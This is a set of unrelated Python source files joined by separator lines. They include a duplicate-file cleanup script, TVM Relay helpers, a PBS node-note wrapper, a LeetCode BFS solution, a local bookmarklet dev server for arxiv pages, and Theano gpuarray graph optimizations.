    with raises(NotImplementedError):
        plotter([], style="QWERTY")
def test_cycle_values():
    """cycle_values yields None/scalars as-is and cycles sequences endlessly."""
    assert next(cycle_values(None)) is None
    assert next(cycle_values(1)) == 1
    cycler = cycle_values([0, 1, 2])
    # Four pulls prove the iterator wraps around after the last element.
    assert [next(cycler) for _ in range(4)] == [0, 1, 2, 0]
|
"""
Author: Rômulo do Carmo Sousa
Description: Remove todos os arquivos terminados em '(1)'
Date: 12-11-2020
"""
import os
import re
import time
# ANSI escape sequences used to colour terminal output.
ciano_claro = "\033[1;96m"  # bright cyan
verde = "\033[1;32m"        # green
vermelho = "\033[1;31m"     # red
reset = "\033[0;0m"         # reset attributes
def repeated_files(files):
    """Return the file names in *files* that end in '(1)' (duplicate downloads)."""
    # A comprehension replaces the findall/extend loop; re.match with a '$'
    # anchor matches exactly the same whole-name pattern as before.
    return [file for file in files if re.match(r".*\(1\)$", file)]
def remove():
    """Delete every duplicated file found in the current directory."""
    duplicates = repeated_files(os.listdir())
    print(f"{verde}Arquivos duplicados: {vermelho}{len(duplicates)}{reset}\n")
    if not duplicates:
        print(f"{ciano_claro}✔ Não existe trabalho aqui ✨{reset}")
        return
    for name in duplicates:
        print(f"{vermelho}✖ {verde}Removendo o arquivo: {vermelho}{name}{reset}")
        # Small pause so the progress output is readable.
        time.sleep(0.1)
        os.remove(name)
        print(f"{verde}✔ Arquivo removido!{reset}")
    print(f"{ciano_claro}✔ Tudo limpinho ✨{reset}")
# Run the cleanup only when executed as a script.
if __name__ == "__main__":
    remove()
|
#!/usr/bin/env python3
# Records the last-update timestamp and, when the car is offroad, uploads
# the collected GPS data.
import datetime
from common.params import Params
from selfdrive.data_collection import gps_uploader

print("Don't forget to pray!")
params = Params()
# Persist the current UTC time (ISO 8601) for other services to read.
t = datetime.datetime.utcnow().isoformat()
params.put("LastUpdateTime", t.encode('utf8'))
# Upload only while offroad; uploading while driving is refused.
if params.get("IsOffroad") == b"1":
    print("Please wait for gps to upload to aviod this in future!")
    gps_uploader.upload_data()
else:
    print("Please switch off car and try again!")
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name
"""Defines a unary natural number (Peano natural number) abstract
data type for Relay and provides some utility functions for it.
Nats are useful for testing purposes, as they make it easy to write
test cases for recursion and pattern matching."""
from tvm.relay.backend.interpreter import ConstructorValue
def get_type(prelude, name):
    """Return (type_var, constructor_0, constructor_1, ...) for the ADT
    called *name* in *prelude*'s module."""
    type_var = prelude.mod.get_global_type_var(name)
    type_data = prelude.mod.type_definitions[type_var]
    return (type_var,) + tuple(type_data.constructors)
def count(prelude, n):
    """Takes a ConstructorValue corresponding to a nat ADT
    and converts it into a Python integer. This is an example of
    using an ADT value in Python.
    """
    assert isinstance(n, ConstructorValue)
    # z (zero) and s (successor) are the two nat constructors.
    _, z, s = prelude.mod.get_type("nat")
    if n.tag == z.tag:
        return 0
    # Otherwise n must be s(m); recurse on the wrapped predecessor.
    assert n.tag == s.tag
    return 1 + count(prelude, n.fields[0])
def make_nat_value(prelude, n):
    """The inverse of count(): given a non-negative Python integer, build
    the ConstructorValue representing it as a nat."""
    _, z, s = prelude.mod.get_type("nat")
    # Build iteratively from zero, wrapping in successors n times.
    value = ConstructorValue(z.tag, [], z)
    for _ in range(n):
        value = ConstructorValue(s.tag, [value], s)
    return value
def make_nat_expr(prelude, n):
    """Given a non-negative Python integer, construct the Relay expression
    representing that integer's value as a nat."""
    assert n >= 0
    _, z, s = prelude.mod.get_type("nat")
    # Start from z() and apply the successor constructor n times.
    expr = z()
    for _ in range(n):
        expr = s(expr)
    return expr
|
""" ci """
from sandboxes.scripts.creators.ci.create_answers import *
from sandboxes.scripts.creators.ci.create_questions import *
from utils.logger import logger
def create_sandbox():
    """Populate the CI sandbox: questions first, then their answers."""
    logger.info('create_ci_sandbox...')
    create_questions()
    create_answers()
    logger.info('create_ci_sandbox...Done.')
|
"""
A wrap python class of 'pbsnodes -N "note" node' command
The purpose of this class is to provide a simple API
to write some attribute and its value pairs to note attribute of cluster nodes.
"""
from __future__ import print_function
from sh import ssh
from ast import literal_eval
from types import *
from copy import deepcopy
from cloudmesh.pbs.pbs import PBS
from cloudmesh.inventory import Inventory
import json
from cloudmesh_base.logger import LOGGER
# ----------------------------------------------------------------------
# SETTING UP A LOGGER
# ----------------------------------------------------------------------
log = LOGGER(__file__)
class pbs_note_builder:
    """Wrapper around ``pbsnodes -N "note" node`` that merges attribute/value
    pairs into a cluster node's note attribute."""

    def __init__(self, user, host):
        self.username = user
        self.hostname = host
        self.inventory = Inventory()
        # Fix: initialise the cache *before* fetching — the original
        # assigned None after fetch_pbs_nodes_info(), clobbering the
        # freshly fetched data.
        self.pbs_nodes_info = None
        self.fetch_pbs_nodes_info()

    def fetch_pbs_nodes_info(self):
        """Refresh the cached pbsnodes info from the cluster."""
        pbs = PBS(self.username, self.hostname)
        self.pbs_nodes_info = pbs.pbsnodes()

    def check_node_validation(self, node):
        """Return (node_id, node_label) for *node*, or raise NameError when
        the node is unknown to the inventory or to pbsnodes."""
        node_id_label = self.inventory.get_host_id_label(node)
        berror = node_id_label is None
        if not berror:
            (node_id, node_label) = node_id_label
            if node_label not in self.pbs_nodes_info.keys():
                berror = True
        if berror:
            raise NameError(
                "pbs_note_builder: '{0}' is NOT a valid or existed node.".format(node))
        return node_id_label

    def get_note(self, node):
        """Print the current note attribute of *node*."""
        (node_id, node_label) = self.check_node_validation(node)
        print("{0}-note: {1}".format(node_id, self.pbs_nodes_info[node_label]["note"]))

    # node is the server name, e.g., i129, i15
    # note is a dict, {"attr1": "value1", "attr2": "value2"}
    # set_note doesn't check the correctness of the attribute-value pair
    def set_note(self, node, note):
        """Merge *note* (dict of attribute/value pairs) into the node's note."""
        (node_id, node_label) = self.check_node_validation(node)
        # The stored "note" has only two forms: dict or plain string.
        prev_note = self.pbs_nodes_info[node_label]["note"]
        if type(prev_note) is dict:
            curr_note = deepcopy(prev_note)
        else:
            # assume the default (string) note is for 'service'
            curr_note = {"service": deepcopy(prev_note)}
        # Fix: lower-case the incoming keys for consistency.  The original
        # built a map() whose result was discarded, so keys were never
        # actually lowered.
        note = dict((str(k).lower(), v) for (k, v) in note.items())
        curr_note.update(note)
        # Serialise the merged dict with json for a stable string form.
        sshnote = json.dumps(curr_note)
        # Command that would update the note attribute on the real node.
        command = " ".join(["pbsnodes -N", sshnote, node_label])
        str_ssh = "@".join([self.username, self.hostname])
        log.debug("pbs_note_builder: command ready to execute is: \n > ssh {0} {1}\n".format(
            str_ssh, command))
        # This operation NEEDs authorization ...
        # ssh(str_ssh, command)

    def set_temperature_note(self, node, temp):
        """Shortcut of set_note for a server's temperature."""
        self.set_one_note(node, "temperature", temp)

    def set_service_note(self, node, service):
        """Shortcut of set_note for a server's service type."""
        self.set_one_note(node, "service", service)

    def set_one_note(self, node, attr, value):
        """Set a single attribute/value pair in the node's note."""
        self.set_note(node, {attr: value})
# Manual test driver only.
if __name__ == "__main__":
    username = "change me"
    hostname = "change me"
    pbsnote = pbs_note_builder(username, "india")
    try:
        pbsnote.get_note(hostname)
        # test temperature
        pbsnote.set_temperature_note(hostname, 99.2)
        # test service type
        pbsnote.set_service_note(hostname, "down")
        # test set_note with mixed key types
        note = {"service": "down, offline",
                "temperature": "-100.12", "test": "debug", 0: 12}
        pbsnote.set_note(hostname, note)
    except NameError as ne:
        # Fix: 'except NameError, ne' is Python-2-only syntax; 'as' works
        # on Python 2.6+ and Python 3.
        print("My exception info: ")
        print(str(ne))
|
# Practice exercise: read two integers, compare their sum against 10,
# and report the result (messages are in Spanish).
a = int(input("Ingrese un numero "))
b = int(input("ingrese otro numero "))
c = a + b
if c < 10:
    print('Su numero es menor que 10 ')
elif c > 10:
    print('Su numero es mayor que 10 ')
elif c == 10:
    print('Su numero es 10 ')
print('Su numero es: ', c)
# Keep the console window open until the user presses Enter.
input('Pulse enter para continuar...')
"""
https://leetcode-cn.com/problems/open-the-lock/
https://leetcode-cn.com/problems/open-the-lock/solution/da-kai-zhuan-pan-suo-by-leetcode/
https://leetcode-cn.com/problems/open-the-lock/solution/python-bfs-qing-xi-ti-jie-by-knifezhu/
"""
from queue import Queue
from typing import List
class Solution:
    def openLock(self, deadends: List[str], target: str) -> int:
        """BFS over the 10^4 lock states; return the fewest turns to reach
        *target* from '0000', or -1 when unreachable.

        Fixes: target == '0000' now returns 0 (the loop previously found it
        via a neighbour and returned 2), and the start state is marked
        visited so it cannot be re-enqueued.
        """
        # 'in' on a set is O(1); the set doubles as the visited marker.
        dead = set(deadends)
        if '0000' in dead:
            return -1
        if target == '0000':
            return 0
        q = Queue()
        q.put(('0000', 0))
        dead.add('0000')  # mark the start as visited
        while not q.empty():
            node, step = q.get()
            for i in range(4):
                for add in (1, -1):
                    # Turn wheel i one notch forward or backward (mod 10).
                    cur = node[:i] + str((int(node[i]) + add) % 10) + node[i + 1:]
                    if cur == target:
                        return step + 1
                    if cur not in dead:
                        q.put((cur, step + 1))
                        dead.add(cur)
        return -1
|
"""Functions for graph-level featurization of the sequence of a protein. This submodule is focussed on physicochemical
proporties of the sequence."""
# %%
# Graphein
# Author: Arian Jamasb <arian@jamasb.io>, Eric Ma
# License: MIT
# Project Website: https://github.com/a-r-j/graphein
# Code Repository: https://github.com/a-r-j/graphein
from __future__ import annotations
from functools import partial
import networkx as nx
from Bio import SeqUtils
from multipledispatch import dispatch
from networkx import Graph
from graphein.protein.features.sequence.utils import (
aggregate_feature_over_chains,
compute_feature_over_chains,
)
# from graphein.protein.features.utils import aggregate_graph_feature_over_chains
@dispatch(str, str)
def molecular_weight(protein: str, seq_type: str = "protein"):
    """Molecular weight of a raw sequence string (str overload).

    Delegates to Bio.SeqUtils.molecular_weight with the given seq_type.
    """
    func = partial(SeqUtils.molecular_weight, seq_type=seq_type)
    return func(protein)
@dispatch(nx.Graph, seq_type=str)
def molecular_weight(protein, seq_type: str = "protein"):
    """Molecular weight computed per chain of a protein graph (Graph overload).

    Stores the result on the graph under the "molecular_weight" feature
    name and returns the graph.
    """
    func = partial(SeqUtils.molecular_weight, seq_type=seq_type)
    G = compute_feature_over_chains(
        protein, func, feature_name="molecular_weight"
    )
    return G
|
from .WS2801Wrapper import WS2801Wrapper
from threading import Thread, Event
def __wait_for__input(event: Event):
    """Block until the user presses Enter, then set *event* to stop the effect."""
    input()
    event.set()
def run_effect(target, additional_args=None):
    """Run an LED effect in a worker thread until the user presses Enter.

    :param target: effect callable invoked as target(pixels, event, *extra)
    :param additional_args: optional extra arguments for the effect —
        assumed to be a tuple when given (TODO confirm callers).
    """
    event = Event()
    pixels = WS2801Wrapper()
    # Start from a dark strip.
    pixels.clear()
    pixels.show()
    args = (pixels, event) + additional_args if additional_args else (pixels, event)
    t1 = Thread(target=target, name="Effect", args=args)
    t1.start()
    # Second thread sets `event` once the user presses Enter.
    t2 = Thread(target=__wait_for__input, name='Input', args=(event,))
    t2.start()
    t1.join()
    t2.join()
|
from __future__ import absolute_import
from elixir import Entity, ManyToOne, OneToMany, ManyToMany, using_options
class A1(Entity):
    """Test entity with relations resolved relative to the tests.db1 package."""
    using_options(resolve_root='tests.db1')
    a2s = OneToMany('A2')   # one A1 -> many A2 (inverse of A2.a1)
    bs = ManyToMany('b.B')  # many-to-many with B from the sibling module b
class A2(Entity):
    """Test entity on the many side of the A1 <-> A2 relation."""
    a1 = ManyToOne('A1')
|
#!/usr/bin/env python
"""
The appropriate bookmarklet for testing is therefore:
javascript:(
function(){
var script = document.createElement('script');
var child = document.body.appendChild(script);
child.src = 'http://127.0.0.1:8001/bookmarklet.js';
}
)();
or, minified:
javascript:(function(){document.body.appendChild(document.createElement('script')).src='http://127.0.0.1:8001/bookmarklet.js';})();
This will call this server and grab the built js and css to inject onto the
current page, if it is an arxiv abstract page.
"""
import os
import json
import string
from http.server import HTTPServer, SimpleHTTPRequestHandler, test
PORT = 8001
class AtTemplate(string.Template):
    """string.Template variant using '@' as the placeholder delimiter, so
    '$' in the JavaScript template needs no escaping."""
    delimiter = '@'
def create_bookmarklet():
    """Render the bookmarklet JS from the template next to this script and
    the asset manifest produced by the build."""
    script_dir = os.path.dirname(os.path.abspath(__file__))
    build_dir = os.path.join(os.path.abspath(os.path.curdir), 'build')
    return bookmarklet_text(
        os.path.join(script_dir, 'bookmarklet.js'),
        os.path.join(build_dir, 'asset-manifest.json'),
    )
def bookmarklet_text(template, manifest):
    """Substitute the built asset filenames and port into the template.

    Fix: both files are now opened with context managers; the originals
    leaked open file handles (``json.load(open(...))`` / ``open(...).read()``).
    """
    with open(manifest) as manifest_file:
        filenames = list(json.load(manifest_file).values())
    with open(template) as template_file:
        tpl = AtTemplate(template_file.read())
    return tpl.substitute(filenames=filenames, port=PORT)
class FlexibleBookmarklet(SimpleHTTPRequestHandler):
    """Static file server that additionally renders /bookmarklet.js on the fly."""

    def do_GET(self):
        # Everything except the bookmarklet is served as a plain static file.
        if self.path != '/bookmarklet.js':
            return super(FlexibleBookmarklet, self).do_GET()
        content = create_bookmarklet()
        self.send_response(200)
        self.send_header('Content-type', 'text/javascript')
        self.end_headers()
        self.wfile.write(content.encode('utf-8'))

    def end_headers(self):
        # Always allow CORS so the injected script loads from any page.
        self.send_header('Access-Control-Allow-Origin', '*')
        SimpleHTTPRequestHandler.end_headers(self)
# Serve on PORT using the stdlib test() helper (handles ctrl-C shutdown).
if __name__ == '__main__':
    test(FlexibleBookmarklet, HTTPServer, port=PORT)
|
import copy
import theano
import numpy
from theano import tensor, scalar
from theano.compile import optdb
from theano.gof import (local_optimizer, EquilibriumDB,
SequenceDB, ProxyDB,
Optimizer, toolbox, DestroyHandler,
InconsistencyError, EquilibriumOptimizer)
from theano.gof.python25 import all, any
from theano.tensor.nnet.conv import ConvOp
from theano.sandbox.gpuarray.type import GpuArrayType
from theano.sandbox.gpuarray.basic_ops import (host_from_gpu,
gpu_from_host,
gpu_alloc,
GpuAlloc,
GpuReshape,
GpuEye)
from theano.sandbox.gpuarray.blas import gpu_dot22, GpuGemv, GpuGemm
from theano.sandbox.gpuarray.conv import GpuConv
from theano.sandbox.gpuarray.nnet import (GpuCrossentropySoftmaxArgmax1HotWithBias,
GpuCrossentropySoftmax1HotWithBiasDx,
GpuSoftmaxWithBias,
GpuSoftmax)
from theano.sandbox.gpuarray.elemwise import (GpuElemwise, _is_scalar,
GpuDimShuffle, GpuCAReduceCuda)
from theano.sandbox.gpuarray.subtensor import GpuIncSubtensor, GpuSubtensor
from theano.sandbox.gpuarray.type import GpuArrayConstant
# Optimizer databases for the gpuarray backend: local rewrites, transfer
# cleanup, and the sequence that runs them in order.
gpu_optimizer = EquilibriumDB()
gpu_cut_copies = EquilibriumDB()
gpu_seqopt = SequenceDB()
gpu_seqopt.register('gpuarray_local_optimiziations', gpu_optimizer, 1,
                    'fast_run', 'inplace', 'gpuarray')
gpu_seqopt.register('gpuarray_cut_transfers', gpu_cut_copies, 2,
                    'fast_run', 'gpuarray')
# Do not add 'fast_run' to these two as this would always enable gpuarray
# mode; position it just before the destroy handler.
optdb.register('gpuarray_opt', gpu_seqopt,
               optdb.__position__.get('add_destroy_handler', 49.5) - 1,
               'gpuarray')
def register_opt(*tags, **kwargs):
    """Decorator factory: register a local optimizer in ``gpu_optimizer``.

    :param tags: extra tags forwarded to the registration.
    :param kwargs: may contain ``name`` to override the registered name
        (defaults to the decorated function's ``__name__``).
    """
    def f(local_opt):
        # BUG FIX: the original `(kwargs and kwargs.pop('name'))` raised
        # KeyError whenever kwargs was non-empty but had no 'name' key.
        name = kwargs.pop('name', None) or local_opt.__name__
        gpu_optimizer.register(name, local_opt, 'fast_run', 'gpuarray', *tags)
        return local_opt
    return f
# The CPU shape-tracking local optimization works unchanged on gpu graphs.
register_opt()(theano.tensor.opt.local_track_shape_i)
def op_lifter(OP):
    """
    Build a decorator that lifts CPU ops in ``OP`` to a GPU counterpart:

    OP(..., host_from_gpu(), ...) -> host_from_gpu(GpuOP(...))
    gpu_from_host(OP(inp0, ...)) -> GpuOP(inp0, ...)

    The wrapped ``maker(node)`` may return a GPU Op (applied to the node's
    inputs), a list/tuple of replacement variables, or a single GPU
    variable; in each case the result is transferred back to the host.
    """
    def f(maker):
        def local_opt(node):
            if type(node.op) in OP:
                # Either one of our inputs is on the gpu or
                # all of our client are on the gpu
                if (any([i.owner and i.owner.op == host_from_gpu
                         for i in node.inputs]) or
                        all([c != 'output' and c.op == gpu_from_host
                             for c, idx in node.outputs[0].clients])):
                    new_op = maker(node)
                    # This is needed as sometimes new_op inherit from OP.
                    if new_op and new_op != node.op:
                        if isinstance(new_op, theano.Op):
                            return [host_from_gpu(o) for o in
                                    new_op(*node.inputs, return_list=True)]
                        elif isinstance(new_op, (tuple, list)):
                            return [host_from_gpu(o) for o in new_op]
                        else:  # suppose it is a variable on the GPU
                            return [host_from_gpu(new_op)]
            return False
        # Keep the maker's name so the registered optimizer is identifiable.
        local_opt.__name__ = maker.__name__
        return local_optimizer(OP)(local_opt)
    return f
class InputToGpuOptimizer(Optimizer):
    "Transfer the input to the gpu to start the rolling wave."
    def add_requirements(self, fgraph):
        # We replace nodes and introduce destructive ops downstream.
        fgraph.attach_feature(toolbox.ReplaceValidate())
        fgraph.attach_feature(DestroyHandler())
    def apply(self, fgraph):
        # Wrap each non-GPU graph input in host_from_gpu(gpu_from_host(.))
        # so the transfer-cutting optimizations can push work to the GPU.
        for input in fgraph.inputs:
            if isinstance(input.type, GpuArrayType):
                continue
            # Skip inputs whose only client is the output or an explicit
            # transfer: wrapping them would gain nothing.
            if (len(input.clients) == 1 and
                (input.clients[0][0] == 'output' or
                 input.clients[0][0].op == gpu_from_host)):
                continue
            try:
                new_input = host_from_gpu(gpu_from_host(input))
                fgraph.replace_validate(input, new_input,
                                        "InputToGpuOptimizer")
            # NOTE: Python 2 except syntax; this file predates Python 3.
            except TypeError, e:
                # This could fail if the inputs are not TensorTypes
                pass
# Runs first (position 0) so inputs are wrapped before other passes fire.
gpu_seqopt.register('InputToGpuArrayOptimizer', InputToGpuOptimizer(),
                    0, 'fast_run', 'fast_compile', 'merge')
@local_optimizer([gpu_from_host, host_from_gpu])
def local_cut_gpu_host_gpu(node):
    """Remove round-trip transfers: gpu(host(x)) -> x and host(gpu(x)) -> x."""
    check_chain = tensor.opt.opt.check_chain
    is_round_trip = (check_chain(node, gpu_from_host, host_from_gpu) or
                     check_chain(node, host_from_gpu, gpu_from_host))
    if is_round_trip:
        return [node.inputs[0].owner.inputs[0]]
    return False
# Cut redundant transfers and fold constants across the host/GPU boundary;
# also register the cut during canonicalization.
gpu_cut_copies.register('cut_gpua_host_transfers', local_cut_gpu_host_gpu,
                        'fast_run', 'inplace', 'gpuarray')
gpu_cut_copies.register('cut_gpua_constant_transfers',
                        tensor.opt.constant_folding,
                        'fast_run', 'gpuarray')
optdb['canonicalize'].register('local_cut_gpua_host_gpua',
                               local_cut_gpu_host_gpu, 'fast_run', 'gpuarray')
@register_opt()
@op_lifter([tensor.Alloc])
def local_gpualloc(node):
    # One-to-one lift: tensor.Alloc -> gpu_alloc with the same inputs.
    return gpu_alloc
@register_opt()
@local_optimizer([GpuAlloc])
def local_gpualloc_memset_0(node):
    # When a GpuAlloc fills with a scalar constant 0, switch to the
    # memset_0 variant of the op.
    if isinstance(node.op, GpuAlloc) and not node.op.memset_0:
        inp = node.inputs[0]
        if (isinstance(inp, GpuArrayConstant) and
            inp.data.size == 1 and
            (numpy.asarray(inp.data) == 0).all()):
            new_out = GpuAlloc(memset_0=True)(*node.inputs)
            return [new_out]
@register_opt()
@op_lifter([tensor.Reshape])
def local_gpureshape(node):
    """Lift tensor.Reshape to GpuReshape, prefixing the op name with 'Gpu'."""
    op = node.op
    name = op.name
    if name:
        name = 'Gpu' + name
    # BUG FIX: the original passed `op.name`, discarding the 'Gpu'-prefixed
    # name computed just above.
    res = GpuReshape(op.ndim, name)
    return res
@register_opt()
@op_lifter([tensor.Flatten])
def local_gpuflatten(node):
    # Flatten is expressed as a GpuReshape to (leading dims..., -1).
    op = node.op
    shp =[]
    if op.outdim != 1:
        shp = [node.inputs[0].shape[i] for i in range(op.outdim - 1)]
    shp += [-1]
    res = GpuReshape(op.outdim, None)
    o = res(node.inputs[0], theano.tensor.as_tensor_variable(shp))
    return o
@register_opt()
@op_lifter([tensor.Elemwise])
def local_gpu_elemwise(node):
    # Lift an elementwise op to GpuElemwise; 0-d outputs stay on the CPU.
    op = node.op
    name = op.name
    if node.outputs[0].ndim == 0:
        return
    if name:
        name = 'Gpu'+name
    res = GpuElemwise(op.scalar_op, name=name,
                      inplace_pattern=copy.copy(op.inplace_pattern),
                      nfunc_spec=op.nfunc_spec)
    return res
def max_inputs_to_GpuElemwise(node):
    """Return how many inputs a fused GpuElemwise kernel can accept.

    Derived from the CUDA limit on total kernel argument size: after the
    mandatory arguments (element count, shape ints, and one pointer plus
    per-dimension strides per output), each extra input costs one pointer
    plus one int per dimension.
    """
    POINTER_BYTES = 8
    INT_BYTES = 4
    # we take the limit from CUDA for now
    ARG_LIMIT_BYTES = 232
    nd = node.inputs[0].type.ndim
    # number of elements and shape
    mandatory_bytes = (INT_BYTES * (nd + 1) +
                       (POINTER_BYTES + INT_BYTES * nd) * len(node.outputs))
    bytes_per_input = POINTER_BYTES + nd * INT_BYTES
    return (ARG_LIMIT_BYTES - mandatory_bytes) // bytes_per_input
# Mirror the CPU elemwise fusion and inplace passes for GpuElemwise.
gpu_local_elemwise_fusion = tensor.opt.local_elemwise_fusion_op(
    GpuElemwise,
    max_inputs_to_GpuElemwise)
optdb.register('gpua_elemwise_fusion',
               tensor.opt.FusionOptimizer(gpu_local_elemwise_fusion), 71.00,
               'fast_run', 'fusion', 'local_elemwise_fusion', 'gpuarray')
inplace_gpu_elemwise_opt = tensor.opt.inplace_elemwise_optimizer_op(
    GpuElemwise)
optdb.register('gpua_inplace_opt', inplace_gpu_elemwise_opt, 75,
               'inplace_elemwise_optimizer', 'fast_run', 'inplace', 'gpuarray')
# One-to-one lifts of view/indexing ops, copying each op's configuration.
@register_opt()
@op_lifter([tensor.DimShuffle])
def local_gpua_dimshuffle(node):
    return GpuDimShuffle(node.op.input_broadcastable,
                         node.op.new_order)
@register_opt()
@op_lifter([tensor.SpecifyShape])
def local_gpua_specifyShape(node):
    # SpecifyShape only carries shape metadata; the CPU helper is reused.
    return tensor.specify_shape
@register_opt()
@op_lifter([tensor.Subtensor])
def local_gpua_subtensor(node):
    return GpuSubtensor(node.op.idx_list)
@register_opt()
@op_lifter([tensor.IncSubtensor])
def local_gpua_incsubtensor(node):
    return GpuIncSubtensor(node.op.idx_list, node.op.inplace,
                           node.op.set_instead_of_inc,
                           node.op.destroyhandler_tolerate_aliased)
@register_opt()
@op_lifter([tensor.CAReduce, tensor.Sum])
def local_gpua_careduce(node):
    """Lift an add/mul CAReduce (float32 only) to GpuCAReduceCuda.

    When the CUDA code generator does not support the reduction pattern,
    try a simpler pattern: collapse adjacent dimensions that share the
    same reduce flag via a reshape, reduce, then reshape back.
    """
    if (isinstance(node.op.scalar_op, scalar.basic.Add) or
        isinstance(node.op.scalar_op, scalar.basic.Mul)):
        x, = node.inputs
        greduce = GpuCAReduceCuda(node.op.scalar_op, axis=node.op.axis)
        # Only float32 is handled by the CUDA reduction kernels.
        if x.dtype != "float32":
            return
        gvar = greduce(x)
        # We need to have the make_node called, otherwise the mask can
        # be None.
        if gvar.owner.op.supports_c_code([gpu_from_host(x)]):
            return greduce
        else:
            # Try to make a simpler pattern based on reshaping.
            # The principle is that if two adjacent dimensions have
            # the same value in the reduce_mask, then we can reshape
            # to make them a single dimension, do the reduction, and
            # then reshape to get them back.
            if node.op.axis is None:
                reduce_mask = [1] * x.type.ndim
            else:
                reduce_mask = [0] * x.type.ndim
                for a in node.op.axis:
                    assert reduce_mask[a] == 0
                    reduce_mask[a] = 1
            shape_of = node.fgraph.shape_feature.shape_of
            x_shape = shape_of[x]
            new_in_shp = [x_shape[0]]
            new_mask = [reduce_mask[0]]
            # Merge runs of dimensions sharing the same reduce flag.
            for i in xrange(1, x.type.ndim):
                if reduce_mask[i] == reduce_mask[i - 1]:
                    new_in_shp[-1] *= x_shape[i]
                else:
                    new_mask.append(reduce_mask[i])
                    new_in_shp.append(x_shape[i])
            # BUG FIX: the original referenced the undefined name
            # `scalar_op` (NameError). Pass the node's scalar op first,
            # matching the GpuCAReduceCuda call above, with the collapsed
            # mask as the reduction pattern.
            new_greduce = GpuCAReduceCuda(node.op.scalar_op,
                                          reduce_mask=new_mask)
            reshaped_x = x.reshape(tensor.stack(*new_in_shp))
            gpu_reshaped_x = gpu_from_host(reshaped_x)
            reshaped_gpu_inputs = [gpu_reshaped_x]
            if new_greduce.supports_c_code(reshaped_gpu_inputs):
                reduce_reshaped_x = host_from_gpu(
                    new_greduce(gpu_reshaped_x))
                if reduce_reshaped_x.ndim != node.outputs[0].ndim:
                    unreshaped_reduce = reduce_reshaped_x.reshape(
                        tensor.stack(*shape_of[node.outputs[0]]))
                else:
                    unreshaped_reduce = reduce_reshaped_x
                return [unreshaped_reduce]
# One-to-one lifts of BLAS and nnet ops to their GPU implementations.
@register_opt()
@op_lifter([tensor.blas.Gemv])
def local_gpua_gemv(node):
    return GpuGemv(inplace=node.op.inplace)
@register_opt()
@op_lifter([tensor.blas_c.CGemv])
def local_gpua_gemv2(node):
    # The C-accelerated CGemv lifts to the same GPU op as blas.Gemv.
    return GpuGemv(inplace=node.op.inplace)
@register_opt()
@op_lifter([tensor.blas.Gemm])
def local_gpua_gemm(node):
    return GpuGemm(inplace=node.op.inplace)
@register_opt()
@op_lifter([tensor.blas.Dot22])
def local_gpua_dot22(node):
    return gpu_dot22
@register_opt()
@op_lifter([tensor.basic.Eye])
def local_gpua_eye(node):
    return GpuEye(dtype=node.op.dtype)
@register_opt()
@op_lifter([tensor.nnet.CrossentropySoftmaxArgmax1HotWithBias])
def local_gpua_crossentropysoftmaxargmax1hotwithbias(node):
    return GpuCrossentropySoftmaxArgmax1HotWithBias()
@register_opt()
@op_lifter([tensor.nnet.CrossentropySoftmax1HotWithBiasDx])
def local_gpua_crossentropysoftmax1hotwithbiasdx(node):
    return GpuCrossentropySoftmax1HotWithBiasDx()
@register_opt()
@op_lifter([tensor.nnet.Softmax])
def local_gpua_softmax(node):
    return GpuSoftmax()
@register_opt()
@op_lifter([tensor.nnet.SoftmaxWithBias])
def local_gpua_softmaxwithbias(node):
    return GpuSoftmaxWithBias()
@register_opt()
@op_lifter([gpu_from_host, ConvOp])
def local_gpu_conv(node):
    """
    gpu_from_host(conv) -> gpu_conv(gpu_from_host)
    conv(host_from_gpu) -> host_from_gpu(gpu_conv)
    """
    def GpuConvOp_from_ConvOp(op):
        # Translate a CPU ConvOp configuration into a GpuConv instance, or
        # into a graph-builder closure when the logical image shape differs
        # from the physical one. Returns None for unsupported configs.
        logical_img_hw = None
        if op.kshp_logical is not None and op.kshp_logical != op.kshp:
            return None
        #print op.kshp, op.imshp[1:3]
        #print op.kshp_logical, logical_img_hw
        ret = GpuConv(border_mode=op.out_mode,
                      subsample=(op.dx, op.dy),
                      logical_img_hw=logical_img_hw,
                      logical_kern_hw=op.kshp_logical,
                      logical_kern_align_top=op.kshp_logical_top_aligned,
                      kshp=op.kshp,
                      version=op.version,
                      verbose=op.verbose,
                      imshp=op.imshp,
                      )
        if op.imshp_logical is not None:
            logical_img_hw = op.imshp_logical[1:3]
            if logical_img_hw != op.imshp[1:3]:
                # this case is not implemented
                #return None
                # NOTE(review): rather than bailing out, the physical image
                # is scattered into a zero buffer of the logical shape with
                # the strides below, then convolved on the GPU.
                rstride = int(numpy.ceil(op.imshp_logical[1] /
                                         float(op.imshp[1])))
                cstride = int(numpy.ceil(op.imshp_logical[2] /
                                         float(op.imshp[2])))
                def make_graph(img, kern):
                    # Zero-pad to the logical shape, then run the GPU conv.
                    buf = tensor.alloc(numpy.asarray(0, dtype=img.dtype),
                                       img.shape[0], *op.imshp_logical)
                    img = tensor.set_subtensor(buf[:, :, ::rstride, ::cstride],
                                               img)
                    img = gpu_from_host(img)
                    return ret(img, kern)
                return make_graph
        return ret
    def values_eq_approx(a, b):
        """Looser comparison used by DebugMode.

        The convolution reduces over the two last dimensions, so rounding
        error grows with the number of elements reduced; widen atol to
        avoid spurious DebugMode failures.
        """
        assert a.ndim == 4
        atol = None
        if a.shape[-1] * a.shape[-2] > 100:
            #For float32 the default atol is 1e-5
            atol = 3e-5
        return GpuArrayType.values_eq_approx(a, b, atol=atol)
    img, kern = node.inputs
    gpu_conv = GpuConvOp_from_ConvOp(node.op)
    if gpu_conv is None:
        return
    out = gpu_conv(gpu_from_host(img),
                   gpu_from_host(kern))
    # in some case the ConvOp broadcast the last 2 dimensions
    # differently then the gpu ConvOp
    out = tensor.patternbroadcast(
        host_from_gpu(out),
        node.outputs[0].broadcastable)
    #op_lifter want the output on the GPU.
    out = gpu_from_host(out)
    out.values_eq_approx = values_eq_approx
    return [out]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
:mod:`fit`
==================
.. module:: fit
:synopsis:
.. moduleauthor:: hbldh <henrik.blidh@swedwise.com>
Created on 2015-09-24, 07:18:22
"""
